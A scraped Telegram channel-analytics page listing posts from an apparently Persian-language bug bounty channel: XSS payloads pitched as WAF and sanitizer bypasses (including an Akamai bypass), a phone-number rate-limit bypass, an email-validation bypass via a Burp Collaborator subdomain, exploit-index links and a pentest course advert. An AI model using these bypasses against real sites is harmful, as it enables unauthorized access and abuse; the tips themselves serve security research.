464
Підписники
Немає даних24 години
Немає даних7 днів
Немає даних30 днів
Триває завантаження даних...
Схожі канали
Немає даних
Виникли проблеми? Будь ласка, оновіть сторінку або зверніться до нашого support-менеджера.
Хмара тегів
Вхідні та вихідні згадування
---
---
---
---
---
---
Залучення підписників
червень '25
червень '25
+152
в 1 каналах
травень '250
в 0 каналах
Get PRO
квітень '25
+38
в 0 каналах
Get PRO
березень '250
в 0 каналах
Get PRO
лютий '25
+93
в 0 каналах
Get PRO
січень '250
в 1 каналах
Get PRO
грудень '24
+15
в 1 каналах
Get PRO
листопад '240
в 0 каналах
Get PRO
жовтень '240
в 0 каналах
Get PRO
вересень '24
+1
в 1 каналах
Get PRO
серпень '240
в 0 каналах
Get PRO
липень '24
+26
в 0 каналах
Get PRO
червень '240
в 0 каналах
Get PRO
травень '240
в 0 каналах
Get PRO
квітень '24
+14
в 0 каналах
Get PRO
березень '240
в 0 каналах
Get PRO
лютий '24
+127
в 0 каналах
Дописи каналу
| 2 | +7 0-CourseIntro.pdf | 144 |
| 3 | +2 android_kernel.pdf | 217 |
| 4 | ریسورس های خوبیه
استفاده کنیدش | 309 |
| 5 | +4 android_part1.pdf | 349 |
| 6 | سایت https://pocorexp.nsa.im/ همهی CVEها رو فهرست کرده و اگر برای هرکدوم اکسپلویت پابلیک وجود داشته باشه، اون رو هم پایینش قرار میده. | 172 |
| 7 | <42 foo="<img src=x onerror=alert(1)//">test</42> | 338 |
| 8 | Немає тексту... | 326 |
| 9 | <22 foo="<img src=x onerror='alert(1)'">test</22>
this payload may help you to bypass WAF or trick sanitizers | 269 |
| 10 | جاهایی که rate limit روی شماره کار میکنه، میتونیم با اضافه کردن + به +98 بایپسش کنیم.
#rate_limit_bypass | 279 |
| 11 | Iframe attacks:
https://castbox.fm/vb/798626958 | 505 |
| 12 | Mac os inside docker:
https://github.com/dockur/macos | 519 |
| 13 | Akamai WAF bypass XSS
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
click and write here!
#WAF #Bypass
@GitBook_s | 570 |
| 14 | رضا یکی از خفن ترین و بهترین استاداییه که من داشتم.
بشدت کارش خفنه.
اگه تونستید حتما شرکت بکنید | 671 |
| 15 | توضیحات ثبت نام منتورینگ که درواقع نقشه راه این دوره است:
منتورینگ شامل ۴۰۰ ساعت ویدیو ضبط شده است که شامل یک سری دوره های مخصوص منتورینگ و یکی سری دوره های من در طول مدت کوچینگ مادام العمر خواهد بود(البته در صورت انجام رفتار خلاف قوانین مثل نشر ویدیو یا همکاری با تیم ها و جاهای دیگر که باعث شک در نقض محرمانگی شود میتواند باعث ریموو شدن کاربر گردد دلیل این موضوع مشکل است: در لایو هانت های منتورینگ سناریو های پیشرفته و متفاوت روی تارگت های باگ بانتی انجام میپذیرد).
پرسش و پاسخ، لایو هکینگ و لایو های دائم هفتگی و ماهانه به همراه اپدیت و اپگرید کامل دوره ها که به صورت رایگان در طول زمان کوچینگ اختیار دانشجویان قرارمیگیرد، در منتورینگ هردانشجو میتواند در طول روز سوالاتاش را مستقیم از شخص مدرس بپرسد یا از گروه های مربوط به منتورینگ استفاده کند
مواردی که تا اینجا تکمیل شده در منتورینگ
بخش اینترو و استارت پن تست وب اپلیکیشن، api, دیتابیس ها sql & nos l
برنامه نویسی جی اس (client side & server side)و مطالب پایه وب هکینگ
مطالبسطح متوسط و اکسپرت وب هکینگ که به حملات api ها نیز پرداخته شده است
باگ بانتی و خودکار سازی حملات
اکسپلویت نویسی با پایتون
سرویس هانتینگ
موارد در حال تکمیل
RedTeam
تمامی موارد از پیشنیاز اغاز میشود تا سطح
پیشرفته
تمام سطوح هرچند یکبار بسته به نیاز و تغییرات، اپدیت و اپگرید خواند شد
تمام پشتیبانی دانشجویان توسط خود من انجام میگردد
برای ثبت نام:
Page instagram: PentesterLand پیام دهید | 457 |
| 16 | اینجا برای اینکه امکان ثبت نام در سامانه میسر باشه باید با یکی از ایمیل های معتبری که قبلا تعریف شده ثبت نام انجام بشه مثل:
example@immuniweb.com
همونجور که میدونید Burp Collaborator امکان دریافت SMTP Connection رو هم داره.
پس ما میتونیم با قرار دادن دامین مورد نظر در سابدامین Collaborator خودمون این Validation رو بایپس کنیم:
example@immuniweb.com.Collaborator.com
به همین سادگی امکان دور زدن این مکانیزم وجود داره،
نکته ایی که مهمه اینه شما میتونید در جاهای متنوعی مخصوصا جاهایی Role های مختلف و سطح دسترسی های مختلفی داره ثبت نام رو انجام بدید ممکنه اگر با ایمیل معتبر سازمان ثبت نام کنید، ممکنه به صورت پیشفرض دسترسی سطح بالاتری بهتون اختصاص داده بشه.
#bugbounty
#challange
#bugbountytips
#testcase | 360 |
| 17 | https://github.com/m14r41/PentestingEverything | 477 |
| 18 | amazing nginx root me challange:
https://www.root-me.org/en/Challenges/Web-Server/Nginx-Root-Location-Misconfiguration | 385 |
| 19 | https://thecyberneh.github.io/posts/MicrosoftBugbounty/ | 470 |
| 20 | https://blog.pspaul.de/posts/bench-press-leaking-text-nodes-with-css/ | 443 |
